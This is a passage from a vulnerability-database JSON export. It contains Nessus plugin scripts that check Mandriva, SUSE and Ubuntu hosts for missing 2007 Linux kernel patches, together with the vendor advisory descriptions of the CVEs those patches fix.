(rpm_check(release:\"MDK2007.0\", reference:\"kernel-xen0-2.6.17.16mdv-1-1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"kernel-xenU-2.6.17.16mdv-1-1mdv2007.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2007.1\", reference:\"kernel-2.6.17.16mdv-1-1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"kernel-doc-2.6.17.16mdv-1-1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"kernel-doc-latest-2.6.17-16mdv\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"kernel-enterprise-2.6.17.16mdv-1-1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"kernel-enterprise-latest-2.6.17-16mdv\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"kernel-latest-2.6.17-16mdv\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"kernel-legacy-2.6.17.16mdv-1-1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"kernel-legacy-latest-2.6.17-16mdv\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"kernel-source-2.6.17.16mdv-1-1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"kernel-source-latest-2.6.17-16mdv\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"kernel-source-stripped-2.6.17.16mdv-1-1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"kernel-source-stripped-latest-2.6.17-16mdv\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"kernel-xen0-2.6.17.16mdv-1-1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"kernel-xen0-latest-2.6.17-16mdv\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"kernel-xenU-2.6.17.16mdv-1-1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"kernel-xenU-latest-2.6.17-16mdv\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T14:45:26", "description": "This kernel update brings the kernel to the one shipped\nwith SLES 10 Service Pack 1 and also fixes the following\nsecurity problems:\n\n- CVE-2007-2242: The IPv6 protocol allows remote attackers\n to cause a denial of service via crafted IPv6 type 0\n route headers (IPV6_RTHDR_TYPE_0) that create network\n amplification between two routers. \n\n The default is that RH0 is disabled now. To adjust this,\nwrite to the file /proc/net/accept_source_route6.\n\n- CVE-2007-2453: The random number feature in the Linux\n kernel 2.6 (1) did not properly seed pools when there is\n no entropy, or (2) used an incorrect cast when extracting\n entropy, which might have caused the random number\n generator to provide the same values after reboots on\n systems without an entropy source.\n\n- CVE-2007-2876: A NULL pointer dereference in SCTP\n connection tracking could be caused by a remote attacker\n by sending specially crafted packets. Note that this\n requires SCTP set-up and active to be exploitable.\n\n- CVE-2007-3105: Stack-based buffer overflow in the random\n number generator (RNG) implementation in the Linux kernel\n before 2.6.22 might allow local root users to cause a\n denial of service or gain privileges by setting the\n default wakeup threshold to a value greater than the\n output pool size, which triggers writing random numbers\n to the stack by the pool transfer function involving\n 'bound check ordering'.\n\n Since this value can only be changed by a root user,\nexploitability is low.\n\n- CVE-2007-3107: The signal handling in the Linux kernel,\n when run on PowerPC systems using HTX, allows local users\n to cause a denial of service via unspecified vectors\n involving floating point corruption and concurrency.\n\n- CVE-2007-2525: Memory leak in the PPP over Ethernet\n (PPPoE) socket implementation in the Linux kernel allowed\n local users to cause a denial of service (memory\n consumption) by creating a socket using connect, and\n releasing it before the PPPIOCGCHAN ioctl is initialized.\n\n- CVE-2007-3513: The lcd_write function in\n drivers/usb/misc/usblcd.c in the Linux kernel did not\n limit the amount of memory used by a caller, which\n allowed local users to cause a denial of service (memory\n consumption).\n\n- CVE-2007-3851: On machines with a Intel i965 based\n graphics card local users with access to the direct\n rendering devicenode could overwrite memory on the\n machine and so gain root privileges.\n\nThis kernel is not compatible to the previous SUSE Linux\n10.1 kernel, so the Kernel Module Packages will need to be\nupdated.", "edition": 25, "published": "2007-10-17T00:00:00", "title": "SuSE Security Update: Kernel Update for SUSE Linux 10.1 (kernel-4193)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2876", "CVE-2007-3107", "CVE-2007-3851", "CVE-2007-3105", "CVE-2007-3513", "CVE-2007-2242", "CVE-2007-2453", "CVE-2007-2525"], "modified": "2007-10-17T00:00:00", "cpe": [], "id": "SUSE_KERNEL-4193.NASL", "href": "https://www.tenable.com/plugins/nessus/27296", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(27296);\n script_cve_id(\"CVE-2007-2242\", \"CVE-2007-2453\", \"CVE-2007-2876\", \"CVE-2007-3105\", \"CVE-2007-3107\", \"CVE-2007-2525\", \"CVE-2007-3513\", \"CVE-2007-3851\");\n\n script_version(\"1.14\");\n\n name[\"english\"] = \"SuSE Security Update: Kernel Update for SUSE Linux 10.1 (kernel-4193)\";\n \n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SuSE system is missing the security patch kernel-4193.\" );\n script_set_attribute(attribute:\"description\", value:\n\"This kernel update brings the kernel to the one shipped\nwith SLES 10 Service Pack 1 and also fixes the following\nsecurity problems:\n\n- CVE-2007-2242: The IPv6 protocol allows remote attackers\n to cause a denial of service via crafted IPv6 type 0\n route headers (IPV6_RTHDR_TYPE_0) that create network\n amplification between two routers. \n\n The default is that RH0 is disabled now. To adjust this,\nwrite to the file /proc/net/accept_source_route6.\n\n- CVE-2007-2453: The random number feature in the Linux\n kernel 2.6 (1) did not properly seed pools when there is\n no entropy, or (2) used an incorrect cast when extracting\n entropy, which might have caused the random number\n generator to provide the same values after reboots on\n systems without an entropy source.\n\n- CVE-2007-2876: A NULL pointer dereference in SCTP\n connection tracking could be caused by a remote attacker\n by sending specially crafted packets. Note that this\n requires SCTP set-up and active to be exploitable.\n\n- CVE-2007-3105: Stack-based buffer overflow in the random\n number generator (RNG) implementation in the Linux kernel\n before 2.6.22 might allow local root users to cause a\n denial of service or gain privileges by setting the\n default wakeup threshold to a value greater than the\n output pool size, which triggers writing random numbers\n to the stack by the pool transfer function involving\n 'bound check ordering'.\n\n Since this value can only be changed by a root user,\nexploitability is low.\n\n- CVE-2007-3107: The signal handling in the Linux kernel,\n when run on PowerPC systems using HTX, allows local users\n to cause a denial of service via unspecified vectors\n involving floating point corruption and concurrency.\n\n- CVE-2007-2525: Memory leak in the PPP over Ethernet\n (PPPoE) socket implementation in the Linux kernel allowed\n local users to cause a denial of service (memory\n consumption) by creating a socket using connect, and\n releasing it before the PPPIOCGCHAN ioctl is initialized.\n\n- CVE-2007-3513: The lcd_write function in\n drivers/usb/misc/usblcd.c in the Linux kernel did not\n limit the amount of memory used by a caller, which\n allowed local users to cause a denial of service (memory\n consumption).\n\n- CVE-2007-3851: On machines with a Intel i965 based\n graphics card local users with access to the direct\n rendering devicenode could overwrite memory on the\n machine and so gain root privileges.\n\nThis kernel is not compatible to the previous SUSE Linux\n10.1 kernel, so the Kernel Module Packages will need to be\nupdated.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install the security patch kernel-4193.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/10/17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Checks for the kernel-4193 package\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n family[\"english\"] = \"SuSE Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/SuSE/rpm-list\");\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif ( rpm_check( reference:\"kernel-bigsmp-2.6.16.53-0.8\", release:\"SUSE10.1\") )\n{\n\tsecurity_hole(port:0, extra:rpm_report_get());\n\texit(0);\n}\nif ( rpm_check( reference:\"kernel-debug-2.6.16.53-0.8\", release:\"SUSE10.1\") )\n{\n\tsecurity_hole(port:0, extra:rpm_report_get());\n\texit(0);\n}\nif ( rpm_check( reference:\"kernel-default-2.6.16.53-0.8\", release:\"SUSE10.1\") )\n{\n\tsecurity_hole(port:0, extra:rpm_report_get());\n\texit(0);\n}\nif ( rpm_check( reference:\"kernel-iseries64-2.6.16.53-0.8\", release:\"SUSE10.1\") )\n{\n\tsecurity_hole(port:0, extra:rpm_report_get());\n\texit(0);\n}\nif ( rpm_check( reference:\"kernel-kdump-2.6.16.53-0.8\", release:\"SUSE10.1\") )\n{\n\tsecurity_hole(port:0, extra:rpm_report_get());\n\texit(0);\n}\nif ( rpm_check( reference:\"kernel-ppc64-2.6.16.53-0.8\", release:\"SUSE10.1\") )\n{\n\tsecurity_hole(port:0, extra:rpm_report_get());\n\texit(0);\n}\nif ( rpm_check( reference:\"kernel-smp-2.6.16.53-0.8\", release:\"SUSE10.1\") )\n{\n\tsecurity_hole(port:0, extra:rpm_report_get());\n\texit(0);\n}\nif ( rpm_check( reference:\"kernel-source-2.6.16.53-0.8\", release:\"SUSE10.1\") )\n{\n\tsecurity_hole(port:0, extra:rpm_report_get());\n\texit(0);\n}\nif ( rpm_check( reference:\"kernel-syms-2.6.16.53-0.8\", release:\"SUSE10.1\") )\n{\n\tsecurity_hole(port:0, extra:rpm_report_get());\n\texit(0);\n}\nif ( rpm_check( reference:\"kernel-um-2.6.16.53-0.8\", release:\"SUSE10.1\") )\n{\n\tsecurity_hole(port:0, extra:rpm_report_get());\n\texit(0);\n}\nif ( rpm_check( reference:\"kernel-xen-2.6.16.53-0.8\", release:\"SUSE10.1\") )\n{\n\tsecurity_hole(port:0, extra:rpm_report_get());\n\texit(0);\n}\nif ( rpm_check( reference:\"kernel-xenpae-2.6.16.53-0.8\", release:\"SUSE10.1\") )\n{\n\tsecurity_hole(port:0, extra:rpm_report_get());\n\texit(0);\n}\nif ( rpm_check( reference:\"kexec-tools-1.101-32.42\", release:\"SUSE10.1\") )\n{\n\tsecurity_hole(port:0, extra:rpm_report_get());\n\texit(0);\n}\nif ( rpm_check( reference:\"mkinitrd-1.2-106.58\", release:\"SUSE10.1\") )\n{\n\tsecurity_hole(port:0, extra:rpm_report_get());\n\texit(0);\n}\nif ( rpm_check( reference:\"multipath-tools-0.4.6-25.21\", release:\"SUSE10.1\") )\n{\n\tsecurity_hole(port:0, extra:rpm_report_get());\n\texit(0);\n}\nif ( rpm_check( reference:\"open-iscsi-2.0.707-0.25\", release:\"SUSE10.1\") )\n{\n\tsecurity_hole(port:0, extra:rpm_report_get());\n\texit(0);\n}\nif ( rpm_check( reference:\"udev-085-30.40\", release:\"SUSE10.1\") )\n{\n\tsecurity_hole(port:0, extra:rpm_report_get());\n\texit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-01T06:56:30", "description": "A flaw was discovered in the PPP over Ethernet implementation. Local\nattackers could manipulate ioctls and cause kernel memory consumption\nleading to a denial of service. (CVE-2007-2525)\n\nAn integer underflow was discovered in the cpuset filesystem. If\nmounted, local attackers could obtain kernel memory using large file\noffsets while reading the tasks file. This could disclose sensitive\ndata. (CVE-2007-2875)\n\nVilmos Nebehaj discovered that the SCTP netfilter code did not\ncorrectly validate certain states. A remote attacker could send a\nspecially crafted packet causing a denial of service. (CVE-2007-2876)\n\nLuca Tettamanti discovered a flaw in the VFAT compat ioctls on 64-bit\nsystems. A local attacker could corrupt a kernel_dirent struct and\ncause a denial of service. (CVE-2007-2878)\n\nA flaw in the sysfs_readdir function allowed a local user to cause a\ndenial of service by dereferencing a NULL pointer. (CVE-2007-3104)\n\nA buffer overflow was discovered in the random number generator. In\nenvironments with granular assignment of root privileges, a local\nattacker could gain additional privileges. (CVE-2007-3105)\n\nA flaw was discovered in the usblcd driver. A local attacker could\ncause large amounts of kernel memory consumption, leading to a denial\nof service. (CVE-2007-3513)\n\nZhongling Wen discovered that the h323 conntrack handler did not\ncorrectly handle certain bitfields. A remote attacker could send a\nspecially crafted packet and cause a denial of service.\n(CVE-2007-3642)\n\nA flaw was discovered in the CIFS mount security checking. Remote\nattackers could spoof CIFS network traffic, which could lead a client\nto trust the connection. (CVE-2007-3843)\n\nIt was discovered that certain setuid-root processes did not correctly\nreset process death signal handlers. A local user could manipulate\nthis to send signals to processes they would not normally have access\nto. (CVE-2007-3848)\n\nThe Direct Rendering Manager for the i915 driver could be made to\nwrite to arbitrary memory locations. An attacker with access to a\nrunning X11 session could send a specially crafted buffer and gain\nroot privileges. (CVE-2007-3851)\n\nIt was discovered that the aacraid SCSI driver did not correctly check\npermissions on certain ioctls. A local attacker could cause a denial\nof service or gain privileges. (CVE-2007-4308).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2007-11-10T00:00:00", "title": "Ubuntu 7.04 : linux-source-2.6.20 vulnerabilities (USN-510-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2876", "CVE-2007-3848", "CVE-2007-3104", "CVE-2007-3851", "CVE-2007-3105", "CVE-2007-3513", "CVE-2007-4308", "CVE-2007-3843", "CVE-2007-2875", "CVE-2007-3642", "CVE-2007-2878", "CVE-2007-2525"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-libc-dev", "p-cpe:/a:canonical:ubuntu_linux:linux-kernel-devel", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-server", "p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-server", "p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.20", "p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.20", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-386", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic", "cpe:/o:canonical:ubuntu_linux:7.04", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-server", "p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-386", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-386", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-lowlatency"], "id": "UBUNTU_USN-510-1.NASL", "href": "https://www.tenable.com/plugins/nessus/28114", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-510-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(28114);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2019/08/02 13:33:01\");\n\n script_cve_id(\"CVE-2007-2525\", \"CVE-2007-2875\", \"CVE-2007-2876\", \"CVE-2007-2878\", \"CVE-2007-3104\", \"CVE-2007-3105\", \"CVE-2007-3513\", \"CVE-2007-3642\", \"CVE-2007-3843\", \"CVE-2007-3848\", \"CVE-2007-3851\", \"CVE-2007-4308\");\n script_xref(name:\"USN\", value:\"510-1\");\n\n script_name(english:\"Ubuntu 7.04 : linux-source-2.6.20 vulnerabilities (USN-510-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was discovered in the PPP over Ethernet implementation. Local\nattackers could manipulate ioctls and cause kernel memory consumption\nleading to a denial of service. (CVE-2007-2525)\n\nAn integer underflow was discovered in the cpuset filesystem. If\nmounted, local attackers could obtain kernel memory using large file\noffsets while reading the tasks file. This could disclose sensitive\ndata. (CVE-2007-2875)\n\nVilmos Nebehaj discovered that the SCTP netfilter code did not\ncorrectly validate certain states. A remote attacker could send a\nspecially crafted packet causing a denial of service. (CVE-2007-2876)\n\nLuca Tettamanti discovered a flaw in the VFAT compat ioctls on 64-bit\nsystems. A local attacker could corrupt a kernel_dirent struct and\ncause a denial of service. (CVE-2007-2878)\n\nA flaw in the sysfs_readdir function allowed a local user to cause a\ndenial of service by dereferencing a NULL pointer. (CVE-2007-3104)\n\nA buffer overflow was discovered in the random number generator. In\nenvironments with granular assignment of root privileges, a local\nattacker could gain additional privileges. (CVE-2007-3105)\n\nA flaw was discovered in the usblcd driver. A local attacker could\ncause large amounts of kernel memory consumption, leading to a denial\nof service. (CVE-2007-3513)\n\nZhongling Wen discovered that the h323 conntrack handler did not\ncorrectly handle certain bitfields. A remote attacker could send a\nspecially crafted packet and cause a denial of service.\n(CVE-2007-3642)\n\nA flaw was discovered in the CIFS mount security checking. Remote\nattackers could spoof CIFS network traffic, which could lead a client\nto trust the connection. (CVE-2007-3843)\n\nIt was discovered that certain setuid-root processes did not correctly\nreset process death signal handlers. A local user could manipulate\nthis to send signals to processes they would not normally have access\nto. (CVE-2007-3848)\n\nThe Direct Rendering Manager for the i915 driver could be made to\nwrite to arbitrary memory locations. An attacker with access to a\nrunning X11 session could send a specially crafted buffer and gain\nroot privileges. (CVE-2007-3851)\n\nIt was discovered that the aacraid SCSI driver did not correctly check\npermissions on certain ioctls. A local attacker could cause a denial\nof service or gain privileges. (CVE-2007-4308).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/510-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.20\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-libc-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.20\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/05/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2007-2019 Canonical, Inc. / NASL script (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(7\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 7.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2007-2525\", \"CVE-2007-2875\", \"CVE-2007-2876\", \"CVE-2007-2878\", \"CVE-2007-3104\", \"CVE-2007-3105\", \"CVE-2007-3513\", \"CVE-2007-3642\", \"CVE-2007-3843\", \"CVE-2007-3848\", \"CVE-2007-3851\", \"CVE-2007-4308\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-510-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"7.04\", pkgname:\"linux-doc-2.6.20\", pkgver:\"2.6.20-16.31\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"linux-headers-2.6.20-16\", pkgver:\"2.6.20-16.31\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"linux-headers-2.6.20-16-386\", pkgver:\"2.6.20-16.31\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"linux-headers-2.6.20-16-generic\", pkgver:\"2.6.20-16.31\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"linux-headers-2.6.20-16-lowlatency\", pkgver:\"2.6.20-16.31\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"linux-headers-2.6.20-16-server\", pkgver:\"2.6.20-16.31\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"linux-image-2.6.20-16-386\", pkgver:\"2.6.20-16.31\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"linux-image-2.6.20-16-generic\", pkgver:\"2.6.20-16.31\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"linux-image-2.6.20-16-lowlatency\", pkgver:\"2.6.20-16.31\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"linux-image-2.6.20-16-server\", pkgver:\"2.6.20-16.31\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"linux-image-debug-2.6.20-16-386\", pkgver:\"2.6.20-16.31\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"linux-image-debug-2.6.20-16-generic\", pkgver:\"2.6.20-16.31\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"linux-image-debug-2.6.20-16-lowlatency\", pkgver:\"2.6.20-16.31\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"linux-image-debug-2.6.20-16-server\", pkgver:\"2.6.20-16.31\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"linux-kernel-devel\", pkgver:\"2.6.20-16.31\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"linux-libc-dev\", pkgver:\"2.6.20-16.31\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"linux-source-2.6.20\", pkgver:\"2.6.20-16.31\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-doc-2.6.20 / linux-headers-2.6 / linux-headers-2.6-386 / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "f5": [{"lastseen": "2016-09-26T17:22:54", "bulletinFamily": "software", "cvelist": ["CVE-2007-2876"], "edition": 1, "description": "A flaw in the connection tracking support for SCTP allows a remote user to cause a denial of service by dereferencing a NULL pointer.\n\nInformation about this advisory is available at the following location:\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2876>\n\n**Note**: This link takes you to a resource outside of AskF5, and it is possible that the information may be removed without our knowledge.\n", "modified": "2013-03-18T00:00:00", "published": "2008-06-30T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/8000/900/sol8920.html", "id": "SOL8920", "title": "SOL8920 - Linux kernel vulnerability CVE-2007-2876", "type": "f5", "cvss": {"score": 6.1, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-06-08T00:16:26", "bulletinFamily": "software", "cvelist": ["CVE-2007-4573"], "edition": 1, "description": "", "modified": "2016-01-09T02:30:00", "published": "2007-12-21T03:00:00", "href": "https://support.f5.com/csp/article/K8171", "id": "F5:K8171", "title": "Linux kernel IA32 System Call vulnerability - CVE-2007-4573", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:20", "bulletinFamily": "software", "cvelist": ["CVE-2007-4573"], "edition": 1, "description": "**Vulnerability description**\n\nThis security advisory describes a vulnerability in the Linux kernel which may allow local users to gain elevated privileges using the IA32 system call emulation functionality on 64-bit platforms.\n\nInformation about this advisory is available at the following location:\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4573>\n", "modified": "2013-03-19T00:00:00", "published": "2007-12-20T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/8000/100/sol8171.html", "id": "SOL8171", "title": "SOL8171 - Linux kernel IA32 System Call vulnerability - CVE-2007-4573", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:45:11", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4573", "CVE-2007-2876", "CVE-2007-3848", "CVE-2007-0773", "CVE-2007-3107", "CVE-2007-3851", "CVE-2007-3105", "CVE-2007-3513", "CVE-2006-6106", "CVE-2006-4145", "CVE-2007-2875", "CVE-2007-4571", "CVE-2007-2525"], "description": "The Linux kernel has been updated to fix various security problems.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": 